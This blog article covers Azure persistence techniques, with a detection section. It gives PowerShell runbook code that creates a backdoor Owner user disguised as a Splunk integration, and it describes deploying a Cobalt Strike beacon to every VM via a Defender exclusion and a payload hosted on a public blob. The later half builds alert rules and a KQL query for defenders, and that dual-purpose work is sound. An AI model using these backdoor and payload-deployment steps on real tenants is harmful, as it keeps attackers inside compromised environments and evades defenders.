Cloud computing is one of the most impactful IT technological advancements in recent years due to perhaps its faster growth rate compared to other technologies in the ICT domain. Because of this, it is important to re-shape and adapt our “classic” penetration testing techniques to match the new demand in Cloud-based services.
In this article, we will be discussing a number of techniques for achieving persistence in Azure which are based on publicly available information and previous research that has been conducted in this area.
Moreover, we will also showcase how to detect and be alerted when said techniques are used by an attacker.
Azure Runbooks and Automation Accounts
The main prerequisite for successfully leveraging any of the techniques that will be showcased in this article, is for the attacker to have already compromised the target Azure environment and escalated their privileges to Global Admin or “Company Administrator” (Domain Admin equivalent for Azure environments).
How could an attacker retain persistence in an Azure environment even after the Blue Team has discovered their presence and kicked them out (e.g., after revoking Global Admin privileges or removing the compromised account altogether).
To achieve persistence, we will be leveraging the power of Azure Runbooks and Automation accounts with the goal of attaining two similar but slightly different objectives:
achieving persistence in the Cloud environment by creating a new highly privileged Azure AD user that will serve the purpose of a backdoor into the cloud environment.
achieving persistence in the underlying Azure infrastructure (e.g., Azure VMs) by obtaining a Cobalt Strike beacon on Azure VMs.
You can refer to previous research for a step-by-step process on how to prepare the environment but that could be summarised as follows:
Create a new automation account with “User Administrator” and “Subscription Owner” permissions set on the subscription level.
Create a runbook with the Automation Account that was just created.
Create a webhook for executing the runbook when access to the Azure environment is lost.
Azure AD User Creation/Backdooring
Once everything is set up, we can then proceed with the creation of a new PS1 Azure Runbook for the newly created Automation Account.
In order for us to blend-in as much as possible with the target Azure environment, we have decided to mimic a Splunk/Azure integration based on official guides/How To from the vendors.
To that end, the following naming convention was adopted:
SplunkDev as the Automation Account name
AzureAutomationMonitor as the runbook script name
The actual runbook script consisted of a PowerShell Code that would create a new service principal with Owner privileges over the target subscription. Let’s try first to identify the script’s main “ingredients”:
It should import the needed modules/dependencies (e.g. Az.Accounts and Az.Resources)
It should establish a connection within the context of the automation account from where the script is executed from
Leveraging the automation account; s privileges, it should create a new user with Owner privileges over the target subscription
Importing modules in a runbook (or any PS1 script) should be as easy as doing the following:
Import-ModuleAz.AccountsImport-ModuleAz.Resources
According to this blog article, establishing the connection to the Azure environment should be easy as:
Please note that while the article mentions “Connect-AzureAD” we had to use AzAccount as that is what we imported in the PS1 script.
After establishing the connection to the AzureAD environment, we will need to:
Create a new Azure Active Directory User
Assign Subscription Owner privileges to the newly created user
According to Microsoft documentation, we can create a new user with the following PS code:
<# The password needs to be converted into the secure string type first #>$SecureStringPassword=ConvertTo-SecureString-String"password"-AsPlainText-ForceNew-AzADUser-DisplayName"MyDisplayName"-UserPrincipalName"myemail@domain.com"-Password$SecureStringPassword-MailNickname"MyMailNickName"
After creating a new user, the only thing left is to assign the Owner role to said user. Microsoft’s official documentation can help us with that:
<# Import the necessary AZ modules for user creation #>Import-ModuleAz.AccountsImport-ModuleAz.Resources<# Establishing the connection to the Azure environment as an automation account. This is made possible by the AzureRunAsConnection feature. #>$connectionName="AzureRunAsConnection"$servicePrincipalConnection=Get-AutomationConnection-Name$connectionNameConnect-AzAccount-ServicePrincipal-TenantId$servicePrincipalConnection.TenantId-ApplicationId$servicePrincipalConnection.ApplicationId-CertificateThumbprint$servicePrincipalConnection.CertificateThumbprint<# The user’s password needs to be converted into the SecureString type in order to use it during the account creation step. #>$Secure_String_Pwd=ConvertTo-SecureString“<redacted>”-AsPlainText-Force<# Creation of a new user #>New-AzADUser-DisplayName"splunk_svc"-UserPrincipalName"splunkdev@<redacted>"-Password$Secure_String_Pwd-MailNickname"SplunkDev"<# Subscription Owner role assignment to the newly created user #>New-AzRoleAssignment-SignInName$user-RoleDefinitionNameOwner
Runbook script for adding a new Azure AD user with Owner permissions
After creating/publishing the runbook, we will need to create a webhook associated with the following procedure:
Click on the “Add webhook” icon with the runbook selected
Select the “Create new webhook” option
Choose a name for the new webhook and make sure that the generated URL has been copied into the clipboard:
The following video showcases the successful execution of the AzureAutomationMonitor that resulted in the creation of the _splunksvc Azure AD user as a backdoor into the compromised cloud environment:
Azure VMs Persistence
In this section we will be showing how an attacker could abuse the runbook feature to effectively compromise Azure VMs in an almost automated fashion.
Although there are better and more effective ways of achieving Cloud to on-prem pivoting, being able to gain a shell on all Azure VMs could still be invaluable for an attacker especially if Active Domain Services are configured on an Azure VM (e.g. Domain Controller on an Azure VM).
To this end, the following steps were performed:
A _splunkforwarder.ps1 script was uploaded into our storage account. The script contained a single line of PowerShell code that added an exception to Windows Defender to allow the execution of our payload which in this instance was a “vanilla” Cobalt Strike implant:
The script is only a PoC and it is far from being OPSEC safe, so please take that into consideration when testing real Azure environments. To blend-in more we also named our payload as indexes.conf which is a common Splunk filename. The indexes.conf file was hosted on the same storage container with a policy that allowed the download of the file publicly:
Note that it is not advised to host your malware on a public Blob as that has the potential of being leaked. This was done for PoC and “Keep It Simple” purposes only.
To create a storage container and upload the payloads, you can follow these steps:
Go to “Storage Accounts” in your Azure portal
Click on “Create” on the top-left corner
On the “Create storage account” page fill out the required fields (apart from the name you can leave the default values):
Hit on “Refresh” under the “Storage accounts” page and click on the newly created Storage account
Click on “Containers” and then click on “+ Container” on the top-left corner to create a new container
To make our life easier, we can select the Blob (anonymous read access for blobs only) access level although that is not recommended on live engagements unless you are okay with having your payloads potentially leaked:
Once the container is created, select it and click on “Upload” on the top-left corner to upload the files.
Once our assets have been uploaded, we can then proceed with the creation of an Azure runbook that will execute our _splunkforwarder.ps1 script which will in turn download/execute our Cobalt Strike beacon (indexes.conf).
A publicly available script for executing PS1 on Azure VMs was slightly modified to serve our purposes:
The $ResourceGroup variable was changed to match the resource group where our target VMs will be under. In our case, we have created a few Azure VMs under the Workstations resource group.
SubscriptionID/StorageAccount/etc variables were replaced with our Storage account details. To access your storage account access keys just click on “Access keys” on your storage account page.
As we wanted to demonstrate that it could be trivial to target virtually any VM hosted in an Azure environment, we added the following line to populate the VMNames variable with all the VMs belonging to the resource group we have specified earlier:
* Once the script has been modified, we can then create the runbook by clicking on our automation account, then selecting “Runbooks” and finally clicking on “+ Create a runbook” in the top-left corner:
At this point, we can copy the PS code in the new window that appears and click on “Save” and then hit the “Publish” button.
To test and demonstrate that the runbook is actually working and that is successfully giving us sweet beacons, we can click on “Test pane” and then on “Start” as showcased in the following video:
PS1 Script Execution Artifacts
The execution of PS1 scripts from an Azure Runbook usually creates the following artifacts:
The PS1 will be downloaded and stored under this directory so ensure that its contents are properly obfuscated as it will be trivial for a Blue Team to analyse the script. If a new script is executed the older one is automatically deleted so it could be a good practice to monitor the directory for any file change, from a defender’s perspective.
Under this directory, it will be possible to find the logs related to the execution of scripts. These logs can be helpful in detecting the execution of scripts especially if that is not a common action within the Azure VM environment.
The collection and monitoring of said artifacts may help in detecting and responding to a potential ongoing attack where an attacker with privileged access to the Azure VMs is trying to expand their reach within the Cloud estate.
Detection
When performing any of the aforementioned persistence techniques, an attacker will leave traces of their activities, and this can be invaluable for the Blue Team to help with early detection and response of security threats. Traces can be left by actions including but not limited to the following:
Creation of new a new Azure AD User/Group
Creation of a new Automation Account
Assignment of high privileged roles/permissions to a new/existing AD user/Automation Account/etc such as:
Owner privileges over the target Azure subscription
Global Admin (e.g., “Company Administrator”) privileges
In this article, we will provide a demonstration on how to detect and receive alerts for the following events:
AD User/Group or Automation Account being added to the current Azure subscription as Owner.
The creation of a new Automation Account
The assignment of Global Admin privileges to a new user
These examples could be easily applied to also capture events such as the creation of a new Automation Runbook for example.
Setting up the Alert Rules
Monitoring the subscription for any role change
To render the rule creation process easier, let us start by manually generating the event we would like to be alerted on, which in this case will be the monitoring of role changes withing the Azure subscription. By following this method, we can quickly create an alert rule based on a pre-existing event rather than creating it from scratch.
To do so, we can start by adding a user as the subscription Owner (or any other role) to trigger an event in the Audit Log:
Go to Services – Subscriptions and select your subscription.
Click on Access control (IAM).
Select the “+ Add” button and choose the “Add role assignment” option.
Select “Owner” as the role.
Click on the user you want to assign the permissions to and click on Save (remember to remove the role afterwards).
We can then wait a few minutes and click on “Activity log”. That should display a new “Create role assignment” record as shown by the following screenshot:
At this point, we can create the rule by clicking on the “+ New alert rule” button:
Follow these steps to create the alert rule:
Leave the default scope on the “Create alert rule”. That should already have “All role assignments” under the Resource field and your subscription name under Hierarchy.
* Click on the condition and modify the “Event initiated by” value in order to be alerted regardless of the user/service principal who initiated the event:
On the “Actions” field click on “Create Action Group”. Select a Resource Group and choose a name for the Action group:
Then click on “Next: Notifications”, select “Email/SMS message/Push/Voice” as the Notification type and choose a name for the notification.
Select “Email” and provide the email address where you would like the alerts sent to. Click Ok to confirm the email address.
Once that is done, click on “Review + create” and then “Create” to finalise the changes.
The created action group should be automatically selected under the Action group name section.
Choose a name for the alert and click on “Create alert rule”. In this instance, we have chosen “SubscriptionMonitor” as the name.
To test the alert rule: add a role assignment to a user and confirm an email alert is received.
If you receive something like the following, the alert should be working as expected:
At the end of the article, we will demonstrate a simple of automating the parsing of such emails so hang on tight until the end. Please note though that if you are serious about detection, you should not rely on email parsing as that is as that technique was used for PoC purposes only. The best option both in terms of security and scalability over time would be to “stream” all Azure related events to a SIEM solution. Although this may be covered in a future article, please do refer to Microsoft’s documentation for more information
Automation Account Creation Alerting
We can create an alert for detecting the creation of a new automation account in a very similar way:
Create a new Automation account to generate the event we will build our alert on. In our instance, the account will be “NewAutomationAccount”.
Once created, head over to “Automation accounts” and select the newly created account.
Select “Create or Update an Azure Automation connection asset” under Activity Log.
Click on “New Alert Rule”.
Azure will complain about the resource selection so click on “Edit resource” and select the Subscription and click on “Done”.
Modify the condition ensuring that:
Status is set to “Started”.
Event initiated by is set to “All services and users”.
Finalise the setting in the same way we have done previously for the SubscriptionMonitor alert.
GlobalAdmin Detection
We are going to use a slightly different approach for detecting if a new or existing user has been granted Global Admin privileges.
To summarise, we will need to:
Create a new “Log Analytics” workspace.
Configure Azure AD so that the appropriate logs are forwarded to our Log Analytics workspace.
Create a new alert rule based on a custom log search query.
Creating a workspace is as easy as going to Log Analytics workspace and clicking on “Create”. Once there, all you will need to do to create the workspace will be to assign it to a resource group and to give it a name which in our case was “AzureLoggingWorkspace”.
Once the workspace has been created, we can then proceed to configure Azure AD to forward the logs to our analytics workspace:
Go to “Azure Active Directory” and select “Monitoring - Diagnostic Settings”.
Click on “+ Add diagnostic setting” and ensure that the appropriate logs are selected and sent to the correct workspace. In our case we have selected everything, just in case.
* Click on “Save” (and wait at least a good amount of time) for the changes to be applied.
Now for creating the actual email alert:
Head over to “Alerts” and click on “+ New Alert Rule”.
Under “Filter by resource type” search for “analytics” and select your analytics workspace. Click on “Done” to confirm.
* Click on “Add condition” and select “Custom Log search”. * Input the following query as the “search query” and specify “0” as the Threshold value. Adjust the “Period (in minutes)” and “Frequency (in minutes)” to your liking. It is fine to leave the default 5 minutes value.
AuditLogs|where OperationNamecontains"Add member to role"andTargetResourcescontains"Company Administrator.
* Click on “Done”. * Assign an action group to the alert rule and finalise it by specifying a name for the rule.
Parsing the Alerts
Once the alerts have been correctly setup and we’ve confirmed that they are working we would still need to parse the received emails to understand the type of event that occurred in the Azure subscription.
As a PoC, we have developed a small python script to do just that. To summarise its function:
The script retrieves all emails with a specific subject and loops over them (e.g., every Azure Alert).
The HTML part of the email is extracted and parsed.
Any id (e.g. user ids, role ids) is “resolved” into its display name by using the “AZ” command line tool.
A summary of the findings is displayed.
Refer to the below video for watching the tool in action:
We have shown a few common techniques that attackers may use to achieve persistence within an Azure environment but also focused, towards the end of the article, on how to detect some of the key actions that a malicious actor may perform.
We wanted to show how you can start familiarising yourself with Azure’s built-in tools for security monitoring in order to detect the noisiest events that an attacker could generate.
Instead of relying on email parsing, scalable and robust monitoring and detection capabilities should be built around the following:
Azure’s built-in tools/services such as the Azure Security Center and Privileged Identity Management services.
For a more custom and precise monitoring rely more on custom log searches and queries (like we did for the Global Admin detection) as in some scenarios we could receive a significant number of emails unless we are precise in what we decide to be alerted on. For example, our SubscriptionMonitor rule will send us an email for any role change, even for non-privileged role changes within the Subscription.
Try to rely on Azure Event Hubs, a big data streaming platform and event ingestion service, and pair it with your SIEM of choice (e.g., Splunk or any of the supported tools).
Integrate what you already have in place in Azure Security Centre if possible.
This blog post is the first part of a series focused on malware detection evasion techniques on Windows. In particular, we look at userland API hooking techniques employed by various security products and ways to identify and bypass them.